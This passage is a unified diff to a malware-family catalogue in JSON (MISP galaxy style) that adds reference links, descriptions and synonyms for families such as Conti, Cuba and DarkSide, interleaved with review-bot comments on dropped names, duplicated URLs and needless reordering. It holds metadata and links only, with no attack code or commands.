+ "https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent",
 "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-attack-day-by-day/",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
 "http://chuongdong.com/reverse%20engineering/2020/12/15/ContiRansomware/",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
 "https://news.sophos.com/en-us/2021/02/16/what-to-expect-when-youve-been-hit-with-conti-ransomware/",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
+ "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/",
+ "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one",
 "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-evasive-by-nature/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
 "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
- "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
 "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/",
+ "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
+ "https://twitter.com/AltShiftPrtScn/status/1417849181012647938",
 "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-265a",
 "https://github.com/cdong1012/ContiUnpacker",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
 "https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf",
+ "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
 "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://www.ic3.gov/Media/News/2021/210521.pdf",
+ "https://thedfirreport.com/2021/05/12/conti-ransomware/",
 "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://www.bleepingcomputer.com/news/security/ryuk-successor-conti-ransomware-releases-data-leak-site/",
+ "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
+ "https://www.bleepingcomputer.com/news/security/angry-conti-ransomware-affiliate-leaks-gangs-attack-playbook/",
+ "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://0xthreatintel.medium.com/reversing-conti-ransomware-bfce15019e74",
+ "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti",
+ "https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf",
+ "https://blog.talosintelligence.com/2021/09/Conti-leak-translation.html",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
+ "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
+ "https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations",
 "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
 "https://twitter.com/AltShiftPrtScn/status/1350755169965924352",
 "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://unit42.paloaltonetworks.com/conti-ransomware-gang/",
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
+ "https://assets.sentinelone.com/ransomware-enterprise/conti-ransomware-unpacked",
+ "https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/",
 "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf",
- "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware"
+ "https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider",
+ "https://therecord.media/disgruntled-ransomware-affiliate-leaks-the-conti-gangs-technical-manuals/",
+ "https://www.bleepingcomputer.com/news/security/ryuk-successor-conti-ransomware-releases-data-leak-site/",
+ "https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf",
+ "https://twitter.com/AltShiftPrtScn/status/1423188974298861571"
 ],
 "synonyms": [],
 "type": []
 },
 "uuid": "c9dca6f3-2a84-4abe-8f33-ccb7a7a0246c",
- "value": "Conti Ransomware"
+ "value": "Conti"
 },
 {
 "description": "FireEye described this malware as a proxy-aware backdoor that communicates using a custom-encrypted binary protocol. It may use the registry to store optional configuration data. The backdoor has been observed to support 26 commands that include directory traversal, file system manipulation, data archival and transmission, and command execution.",
@@ -12090,11 +13913,26 @@
 "uuid": "9afa9b7e-e2c1-4725-8d8d-cec7933cc63b",
 "value": "CookieBag"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.copper_stealer",
+ "https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "87afcc5d-27f6-4427-b43c-4621a66e5041",
+ "value": "CopperStealer"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report_BosonSpider.pdf",
+ "https://www.crowdstrike.com/blog/ecrime-ecosystem/",
 "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/"
 ],
 "synonyms": [],
@@ -12159,6 +13997,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cotx",
+ "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf",
 "https://www.youtube.com/watch?v=1WfPlgtfWnQ",
 "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
 "https://vblocalhost.com/uploads/VB2020-20.pdf",
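Review bot: `"value": "Conti Ransomware"` becomes `"value": "Conti"` while `"synonyms": []` is left empty, so the name under which this cluster has been applied until now disappears from the entry. MISP builds galaxy tags from the cluster value (of the form `misp-galaxy:malpedia="Conti Ransomware"`), so tags already attached to events stop matching this cluster by name; the unchanged uuid keeps uuid-based lookups working but not the tag string. Carrying the old name forward as `"synonyms": [ "Conti Ransomware" ],` keeps it resolvable and searchable. The same rename without a synonym is made for Cring, Cuba, Cursed Murderer and Cyrat in the hunks further down.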
@@ -12173,7 +14012,7 @@
 "value": "Cotx RAT"
 },
 {
- "description": "",
+ "description": "Covicli is a modified SSLeay32 dynamic library designated as a backdoor.\r\nThe dynamic library allows the attacker to communicate with the C2 over openSSL.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.covicli",
@@ -12232,6 +14071,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.crat",
 "https://mp.weixin.qq.com/s/2sV-DrleHiJMSpSCW0kAMg",
+ "https://suspected.tistory.com/269",
+ "https://www.secrss.com/articles/18635",
 "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
 "https://blog.talosintelligence.com/2020/11/crat-and-plugins.html"
 ],
@@ -12284,20 +14125,29 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson",
- "https://s.tencent.com/research/report/669.html",
+ "https://www.seqrite.com/blog/operation-honey-trap-apt36-targets-defense-organizations-in-india/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://anchorednarratives.substack.com/p/trouble-in-asia-and-the-middle-east",
+ "https://twitter.com/teamcymru/status/1351228309632385027",
+ "https://team-cymru.com/blog/2021/04/16/transparent-tribe-apt-infrastructure-mapping/",
+ "https://team-cymru.com/blog/2021/07/02/transparent-tribe-apt-infrastructure-mapping-2/",
+ "https://securelist.com/transparent-tribe-part-2/98233/",
+ "https://cybleinc.com/2021/04/30/transparent-tribe-operating-with-a-new-variant-of-crimson-rat/",
+ "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
+ "https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg",
 "https://blog.yoroi.company/research/transparent-tribe-four-years-later",
 "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
 "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF",
- "https://securelist.com/transparent-tribe-part-2/98233/",
+ "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html",
+ "https://mp.weixin.qq.com/s/ELYDvdMiiy4FZ3KpmAddZQ",
+ "https://s.tencent.com/research/report/669.html",
 "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg",
 "https://www.secrss.com/articles/24995",
- "https://twitter.com/teamcymru/status/1351228309632385027",
 "https://securelist.com/transparent-tribe-part-1/98127/",
 "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf",
- "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
- "https://www.seqrite.com/blog/operation-honey-trap-apt36-targets-defense-organizations-in-india/"
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols"
 ],
 "synonyms": [
 "SEEDOOR",
@@ -12322,36 +14172,44 @@
 "value": "CrimsonIAS"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cring",
+ "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Vulnerability-in-Fortigate-VPN-servers-is-exploited-in-Cring-ransomware-attacks-En.pdf",
+ "https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728",
 "https://twitter.com/swisscom_csirt/status/1354052879158571008"
 ],
 "synonyms": [],
 "type": []
 },
 "uuid": "f5a19987-d0b6-4cc3-89ab-d4540f2e9744",
- "value": "Cring Ransomware"
+ "value": "Cring"
 },
 {
 "description": "According to FireEye, CROSSWALK is a skeletal, modular backdoor capable of system survey and adding modules in response to C&C replies.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.crosswalk",
+ "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/",
 "https://securelist.com/apt-trends-report-q3-2020/99204/",
 "https://www.youtube.com/watch?v=8x-pGlWpIYI",
 "https://www.carbonblack.com/2019/09/30/cb-threat-analysis-unit-technical-analysis-of-crosswalk/",
+ "https://www.youtube.com/watch?v=FttiysUZmDw",
+ "https://thehackernews.com/2021/01/researchers-disclose-undocumented.html",
 "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
 "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
 "https://content.fireeye.com/apt-41/rpt-apt41/",
 "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-state-sponsored-espionage-group-targeting-multiple-verticals-with-crosswalk/",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware",
 "https://twitter.com/MrDanPerez/status/1159459082534825986"
 ],
 "synonyms": [
 "Motnug",
- "ProxIP"
+ "ProxIP",
+ "TOMMYGUN"
 ],
 "type": []
 },
@@ -12363,6 +14221,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.crutch",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
 "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/"
 ],
 "synonyms": [],
@@ -12380,8 +14239,10 @@
 "https://hackmag.com/security/ransomware-russian-style/",
 "https://securelist.com/the-return-of-fantomas-or-how-we-deciphered-cryakl/86511/",
 "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/",
+ "https://securelist.com/cis-ransomware/104452/",
 "https://twitter.com/albertzsigovits/status/1217866089964679174",
 "https://twitter.com/bartblaze/status/1305197264332369920",
+ "https://www.telekom.com/en/blog/group/article/lockdata-auction-631300",
 "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
 "https://bartblaze.blogspot.com/2016/02/vipasana-ransomware-new-ransom-on-block.html",
 "https://blog.checkpoint.com/2015/11/04/offline-ransomware-encrypts-your-data-without-cc-communication/",
@@ -12480,12 +14341,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "http://www.secureworks.com/research/threat-profiles/gold-evergreen",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
 "https://sites.temple.edu/care/ci-rw-attacks/",
 "https://www.secureworks.com/research/threat-profiles/gold-evergreen",
 "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
 "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://www.secureworks.com/research/cryptolocker-ransomware"
+ "https://www.secureworks.com/research/cryptolocker-ransomware",
+ "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware"
 ],
 "synonyms": [],
 "type": []
@@ -12663,6 +14528,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ctb_locker",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
 "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
 "https://samvartaka.github.io/malware/2015/11/20/ctb-locker"
 ],
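Review bot: The added `"http://www.secureworks.com/research/threat-profiles/gold-evergreen"` duplicates the `https://` form of the same URL that is already present as context three lines below, so the CryptoLocker entry now carries one reference twice under two schemes. The Cobalt Strike hunk earlier in this diff does the same with gold-kingswood, adding both an `https://` and an `http://` copy. Dropping the `http://` line here is enough for this entry; if the refs are produced by a generator, normalizing the scheme before de-duplicating would stop the pattern from recurring (the Cutwail entry already holds a plain-http `gold-essex` link as context).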
@@ -12673,17 +14539,22 @@
 "value": "CTB Locker"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuba",
- "https://id-ransomware.blogspot.com/2019/12/cuba-ransomware.html"
+ "https://id-ransomware.blogspot.com/2019/12/cuba-ransomware.html",
+ "https://shared-public-reports.s3-eu-west-1.amazonaws.com/Cuba+Ransomware+Group+-+on+a+roll.pdf",
+ "https://blog.group-ib.com/hancitor-cuba-ransomware",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-threat-report-a-quick-primer-on-cuba-ransomware",
+ "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf"
 ],
 "synonyms": [],
 "type": []
 },
 "uuid": "6d9dfc5f-4ebf-404b-ab5e-e6497867fe65",
- "value": "Cuba Ransomware"
+ "value": "Cuba"
 },
 {
 "description": "",
@@ -12714,7 +14585,22 @@
 "value": "Cueisfry"
 },
 {
- "description": "",
+ "description": "Profero describes this as a ransomware family using CryptoPP as library to enable file encryption with the Salsa20 algorithm and protecting the encryption keys with RSA2048.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.curator",
+ "https://shared-public-reports.s3.eu-west-1.amazonaws.com/Secrets_behind_the_mysterious_ever101_ransomware.pdf"
+ ],
+ "synonyms": [
+ "Ever101"
+ ],
+ "type": []
+ },
+ "uuid": "f1d2093b-e008-4591-8a67-5b9c7684b8c6",
+ "value": "Curator"
+ },
+ {
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cursed_murderer",
@@ -12724,7 +14610,7 @@
 "type": []
 },
 "uuid": "600a73bf-d699-4400-ac35-6aed4ae5e528",
- "value": "Cursed Murderer Ransomware"
+ "value": "Cursed Murderer"
 },
 {
 "description": "",
@@ -12747,6 +14633,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail",
 "http://www.secureworks.com/research/threat-profiles/gold-essex",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
+ "https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
 "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
@@ -12770,10 +14658,11 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate",
 "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
- "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
- "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
 "https://blog.reversinglabs.com/blog/rats-in-the-library",
- "https://citizenlab.ca/2015/12/packrat-report/"
+ "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
+ "https://citizenlab.ca/2015/12/packrat-report/",
+ "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols"
 ],
 "synonyms": [
 "Rebhip"
@@ -12809,7 +14698,7 @@
 "value": "CycBot"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cyrat",
@@ -12820,7 +14709,7 @@
 "type": []
 },
 "uuid": "1995ed0a-81d9-43ca-9b38-6f001af84bbc",
- "value": "Cyrat Ransomware"
+ "value": "Cyrat"
 },
 {
 "description": "",
@@ -12845,9 +14734,12 @@
 "https://www.sygnia.co/mata-framework",
 "https://securelist.com/apt-trends-report-q2-2020/97937/",
 "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://malwareandstuff.com/peb-where-magic-is-stored/",
 "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
 ],
- "synonyms": [],
+ "synonyms": [
+ "MATA"
+ ],
 "type": []
 },
 "uuid": "7c2b19be-f06b-4b21-b003-144e92d291d1",
@@ -12910,11 +14802,12 @@
 "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
 "https://www.proofpoint.com/us/threat-insight/post/danabot-control-panel-revealed",
 "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/",
+ "https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/",
 "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/",
 "https://www.proofpoint.com/us/blog/threat-insight/new-year-new-version-danabot",
 "https://www.gdatasoftware.com/blog/2019/05/31695-strange-bits-smuggling-malware-github",
 "https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
 "https://asert.arbornetworks.com/danabots-travels-a-global-perspective/",
 "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
 "https://malwareandstuff.com/deobfuscating-danabots-api-hashing/",
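Review bot: The -12910 hunk replaces the welivesecurity 2019/02/07 DanaBot reference with the 2018/12/06 one, and the -12922 hunk on the next line does the exact reverse, so the pair is a pure reorder with no content change. The same churn appears in the CyberGate (-12770) and Dharma (-13468) hunks, where existing references are removed and re-added at other positions, which buries the genuine additions among spurious lines. If this file is generated, as the malpedia URLs suggest, emitting each `refs` array in a stable order (sorted, or existing order with new entries appended) would keep these diffs reviewable.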
@@ -12922,12 +14815,15 @@
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://research.checkpoint.com/danabot-demands-a-ransom-payment/",
 "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
 "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0",
 "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
 "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
 "https://blog.yoroi.company/research/dissecting-the-danabot-paylaod-targeting-italy/",
+ "https://blog.lexfo.fr/danabot-malware.html",
 "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
- "https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/",
+ "https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/",
 "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/"
 ],
 "synonyms": [],
@@ -12943,7 +14839,9 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.danbot",
 "https://dragos.com/wp-content/uploads/Dragos-Oil-and-Gas-Threat-Perspective-2019.pdf",
 "https://www.secureworks.com/research/threat-profiles/cobalt-lyceum",
+ "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf",
 "https://otx.alienvault.com/pulse/5d4301edb3f3406ac01acc0f",
+ "https://www.youtube.com/watch?v=FttiysUZmDw",
 "https://cyberx-labs.com/blog/deep-dive-into-the-lyceum-danbot-malware/"
 ],
 "synonyms": [],
@@ -12960,6 +14858,7 @@
 "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
 "https://content.fireeye.com/apt/rpt-apt38",
 "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
 "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html",
 "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
 "https://www.sysnet.ucsd.edu/sysnet/miscpapers/darkmatter-www20.pdf",
@@ -12981,6 +14880,19 @@
 "uuid": "5086a6e0-53b2-4d96-9eb3-a0237da2e591",
 "value": "DarkComet"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkirc",
+ "https://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8258311c-0d64-4c6b-ab94-915e2cc267f0",
+ "value": "DarkIRC"
+ },
 {
 "description": "",
 "meta": {
@@ -13042,7 +14954,8 @@
 "description": "DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry.",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/darkshell-ddos-botnet-evolves-with-variants/"
 ],
 "synonyms": [],
 "type": []
@@ -13051,28 +14964,115 @@
 "value": "DarkShell"
 },
 {
- "description": "",
+ "description": "FireEye describes DARKSIDE as a ransomware written in C and configurable to target files whether on fixed, removable disks, or network shares. The malware can be customized by the affiliates to create a build for specific victims.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkside",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-is-creating-a-secure-data-leak-service-in-iran/",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://www.bloomberg.com/news/articles/2021-05-13/colonial-pipeline-paid-hackers-nearly-5-million-in-ransom",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "http://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/",
+ "https://www.intel471.com/blog/darkside-ransomware-colonial-pipeline-attack",
+ "https://news.sophos.com/en-us/2021/05/11/a-defenders-view-inside-a-darkside-ransomware-attack/",
+ "https://www.advanced-intel.com/post/from-dawn-to-silent-night-darkside-ransomware-initial-attack-vector-evolution",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://github.com/sisoma2/malware_analysis/tree/master/blackmatter",
+ "https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
+ "https://twitter.com/ValthekOn/status/1422385890467491841?s=20",
 "https://ghoulsec.medium.com/mal-series-13-darkside-ransomware-c13d893c36a6",
- "https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/",
-
"https://socprime.com/blog/affiliates-vs-hunters-fighting-the-darkside/",
+ "https://therecord.media/popular-hacking-forum-bans-ransomware-ads/",
+ "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
+ "https://www.nozominetworks.com/blog/colonial-pipeline-ransomware-attack-revealing-how-darkside-works/",
+ "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b",
+ "https://www.reuters.com/technology/colonial-pipeline-halts-all-pipeline-operations-after-cybersecurity-attack-2021-05-08/",
+ "https://blog.cyble.com/2021/08/05/blackmatter-under-the-lens-an-emerging-ransomware-group-looking-for-affiliates/",
+ "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/",
+ "https://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-is-creating-a-secure-data-leak-service-in-iran/",
+ "https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware",
+ "https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf",
+ "https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections",
